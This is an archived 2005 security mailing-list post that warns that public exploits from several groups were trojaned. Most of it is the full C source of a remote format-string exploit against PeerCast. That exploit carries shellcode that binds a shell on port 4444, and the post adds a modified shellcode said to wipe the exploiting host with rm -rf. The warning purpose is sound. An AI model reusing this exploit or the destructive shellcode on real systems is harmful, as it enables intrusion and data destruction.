lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <200507270255.j6R2tIJw089945@mailserver2.hushmail.com> Date: Wed Jul 27 03:55:30 2005 From: securitymarket at hush.ai (securitymarket@...h.ai) Subject: Beware trojaned exploits! -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hackers may be at risk! It has come to our attention that a large amount of public security exploits/software have been modified and re-posted to legitimate trusted information sites for public downloads. We have recently came across 5 exploits that have had a shellcode modification after legit verification of trusted download sites. The following information security sites have listed a number of modified exploits: unl0ck security research g0tfault security m00 security Unl0ck was recently broken into by a anti-security/hacker organization named dikline (dikline.com ?) and ALL exploit sources were modified in different ways to infect the host attempting to exploit them. Numerous modified sources of "internal" / "0day" sources by a security group named "m00 security" have also been reported as modified by the dikline organization. We have audited numerous public exploit code's and have come up with some interesting results. The following is a clear example of modified shellcode to: Original shellcode of the exploit "p33r-b33r.c" by unl0ck: /* \ PeerCast <= 0.1211 remote format string exploit / [<< Public Release >>] \ / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] \ / uKt researcherz [ http://unl0ck.org ] \ / greetz goes to: uKt researcherz. \ / \ - smallest code - better code!!! / */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> //******************************************* #define doit( b0, b1, b2, b3, addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } //******************************************* //**************************************************************** char shellcode[] = // binds 4444 port "\x31\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x85" "\x4f\xca\xdf\x83\xeb\xfc\xe2\xf4\xb4\x94\x99\x9c\xd6\x25\xc8\xb5" "\xe3\x17\x53\x56\x64\x82\x4a\x49\xc6\x1d\xac\xb7\x94\x13\xac\x8c" "\x0c\xae\xa0\xb9\xdd\x1f\x9b\x89\x0c\xae\x07\x5f\x35\x29\x1b\x3c" "\x48\xcf\x98\x8d\xd3\x0c\x43\x3e\x35\x29\x07\x5f\x16\x25\xc8\x86" "\x35\x70\x07\x5f\xcc\x36\x33\x6f\x8e\x1d\xa2\xf0\xaa\x3c\xa2\xb7" "\xaa\x2d\xa3\xb1\x0c\xac\x98\x8c\x0c\xae\x07\x5f"; //**************************************************************** //**************************** #define HOST "127.0.0.1" #define PORT 7144 #define GOTADDR 0x0809da9c #define SHELLADDR 0x49adb23c //**************************** //****************************************************************** ***** char * evil_builder( unsigned int retaddr, unsigned int offset, unsigned int base, long figure ) { char * buf; unsigned char b0, b1, b2, b3; int start = 256; doit( b0, b1, b2, b3, retaddr ); buf = (char *)malloc(999); memset( buf, 0, 999 ); b3 -= figure; b2 -= figure; b1 -= figure; b0 -= figure; snprintf( buf, 999, "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n", b3 - 16 + start - base, offset, b2 - b3 + start, offset + 1, b1 - b2 + start, offset + 2, b0 - b1 + start, offset + 3 ); return buf; } //****************************************************************** ******* //****************************************************************** ******* int main( int argc, char * argv[] ) { struct sockaddr_in addr; int sock; char * fmt; char endian[31337], da_shell[31337]; unsigned long locaddr, retaddr; unsigned int offset, base; unsigned char b0, b1, b2, b3; system("clear"); printf("*^*^*^ PeerCast <= 0.1211 remote format string exploit ^*^*^*\n"); printf("*^*^*^ by Darkeagle ^*^*^*\n"); printf("*^*^*^ uKt researcherz [ http://unl0ck.org ] ^*^*^*\n\n"); memset( endian, 0x00, 31337 ); memset( da_shell, 0x00, 31337 ); addr.sin_family = AF_INET; addr.sin_port = htons(PORT); addr.sin_addr.s_addr = inet_addr(HOST); sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP); locaddr = GOTADDR; retaddr = SHELLADDR; offset = 1265; // GET /html/en/index.htmlAAA%1265$x and you will get AAAA41414141 doit( b0, b1, b2, b3, locaddr ); base = 4; printf("[*] Buildin' evil code\n"); strcat(endian, "GET /html/en/index.html"); snprintf( endian+strlen(endian), sizeof(endian), "%c%c%c%c" "%c%c%c%c" "%c%c%c%c" "%c%c%c%c", b3, b2, b1, b0, b3 + 1, b2, b1, b0, b3 + 2, b2, b1, b0, b3 + 3, b2, b1, b0 ); fmt = evil_builder( retaddr, offset, base, 0x10 ); memset(fmt+strlen(fmt), 0x55, 32); strcat(fmt, shellcode); strcat(endian, fmt); strcat(endian, "\r\n\r\n\r\n"); printf("[+] Buildin' complete!\n"); sprintf(da_shell, "telnet %s 4444", HOST); // just go, y0! printf("[*] Connectin'\n"); if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) ) { printf("[-] Connection failed!\n\n"); exit(0); } printf("[+] Connected!\n"); printf("[*] Sleepin'\n"); sleep(1); printf("[*] Sendin'\n"); send(sock, endian, strlen(endian), 0); printf("[*] Sleepin'\n"); sleep(1); printf("[*] Connectin' in da shell\n\n"); sleep(1); system(da_shell); return 0; } - ----------- Replaced modified shellcode to rm-rf remote host: /* \ PeerCast <= 0.1211 remote format string exploit / [<< Public Release >>] \ / by Darkeagle [ darkeagle [at] linkin-park [dot] cc ] \ / uKt researcherz [ http://unl0ck.org ] \ / greetz goes to: uKt researcherz. \ / \ - smallest code - better code!!! / */ #include <stdio.h> #include <stdlib.h> #include <stdarg.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <unistd.h> #include <netdb.h> //******************************************* #define doit( b0, b1, b2, b3, addr ) { \ b0 = (addr >> 24) & 0xff; \ b1 = (addr >> 16) & 0xff; \ b2 = (addr >> 8) & 0xff; \ b3 = (addr ) & 0xff; \ } //******************************************* //**************************************************************** char shellcode[] = // binds 4444 port "\x31\xc0\x50\x68\x66\x20\x2f\x58\x68\x6d\x20\x2d\x72\x68\x2d" "\x63\x58\x72\x68\x41\x41\x41\x41\x68\x41\x41\x41\x41\x68\x41" "\x41\x41\x41\x68\x41\x41\x41\x41\x68\x2f\x73\x68\x43\x68\x2f" "\x62\x69\x6e\x31\xc0\x88\x44\x24\x07\x88\x44\x24\x1a\x88\x44" "\x24\x23\x89\x64\x24\x08\x31\xdb\x8d\x5c\x24\x18\x89\x5c\x24" "\x0c\x31\xdb\x8d\x5c\x24\x1b\x89\x5c\x24\x10\x89\x44\x24\x14" "\x31\xdb\x89\xe3\x8d\x4c\x24\x08\x31\xd2\x8d\x54\x24\x14\xb0" "\x0b\xcd\x80\x31\xdb\x31\xc0\x40\xcd\x80"; //**************************************************************** The above shellcode is a modified version that was found listed on the unl0ck security website under downloads days before the site went down. We have audited and found differences in shellcode on the following code: (POSSIBLY MANY MORE) unrealmagic.c - shellcode modified to rm -rf /* host p33r-b33r.c - shellcode modified to rm -rf /* host 0x666-ftpd.c - shellcode modified to rm -rf /* host gotfault-htdead.c - shellcode modified to rm -rf /* host gotfault-lcdproc.c - shellcode modified to install LKM gotfault-newspost.c - shellcode modified to rm -rf /* host gotfault-ngircd.c - shellcode modified to rm -rf /* host gotfault-nwlpstat.c - shellcode modified to rm -rf /* host gotfault-openftpd-msg.c - shellcode modified to install LKM gotfault-pbs4q.c - shellcode modified to add password to mail users gotfault-putty.c - shellcode modified to install LKM gotfault-realmagicV2.c - shellcode modified to install LKM gotfault-sing.sh - shellcode modified to install unknown backdoor. gotfault-vmpsd.c - shellcode modified to rm -rf /* host gotfault-zebedee.c - shellcode modified to rm -rf /* host gotfault-zebedee-win32.zip - unknown gotfault-exim.tar.gz - shellcode modified to rm -rf /* host gotfault-3cdsmash.c - shellcode modified to install NEW LKM gotfault-psoproxy.c - shellcode modified to install LKM gotfault-pcwsd.c - shellcode modified to install LKM This is an urgent notice to all of the security individuals who have downloaded any of the above (and more) exploits. Please take note to your collections we must find out what this dikline organization has backdoor'd and fix it! *** MAKE SURE to check your shellcode whenever possible. -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkLm90gACgkQPRXecBfP4rZkowCfTvlwuZz3VoO7/fToI0UrhUhygekA njACLQnU0QQDfXtKglEjX7ko5TdA =nU9l -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427
Powered by blists - more mailing lists